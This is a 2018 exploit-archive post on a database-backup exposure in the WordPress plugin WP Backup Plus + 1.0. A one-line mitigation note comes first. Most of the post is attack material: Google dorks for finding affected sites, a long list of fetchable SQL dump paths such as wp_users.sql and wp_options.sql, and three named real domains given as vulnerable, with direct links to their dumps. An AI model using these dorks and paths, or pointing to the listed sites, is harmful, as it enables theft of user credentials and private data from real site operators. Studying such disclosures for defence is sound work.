WordPress WP Backup Plus + plugin version 1.0 suffers from a database backup disclosure vulnerability: the SQL dump files it writes under the web-accessible /wp-content/uploads/wp-backup-plus/temp/ directory can be fetched directly by URL. Operators should remove stale dumps from that directory and deny direct web access to it (or store backups outside the web root).
b4b6a29dfc7274fbd4c2a06152298f15
#################################################################################################
# Exploit Title : WordPress WP Backup Plus + 1.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : wpbackupplus.com ~ wplaunchpad.io ~ wordpress.org
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''
# Exploit Risk : Medium
# Version Information : 1.0
# Google Dorks : inurl:''/wp-content/uploads/wp-backup-plus/temp/''
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110143
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2245
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31472
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] - CWE-23 [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] - CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/uploads/wp-backup-plus/temp/database.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql
/wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_comments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql
/wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql
/wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql
/wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql
/wp-content/uploads/wp-backup-plus/temp/wp_terms.sql
/wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20v
IjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vI
jtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip.log
#################################################################################################
# Example Vulnerable Sites =>
[+] wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
[+]
curtiswrightoutfitters.com/wp-content/uploads/wp-backup-plus/temp/database.sql
[+] wpbackupplus.com/wp-content/uploads/wp-backup-plus/temp/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################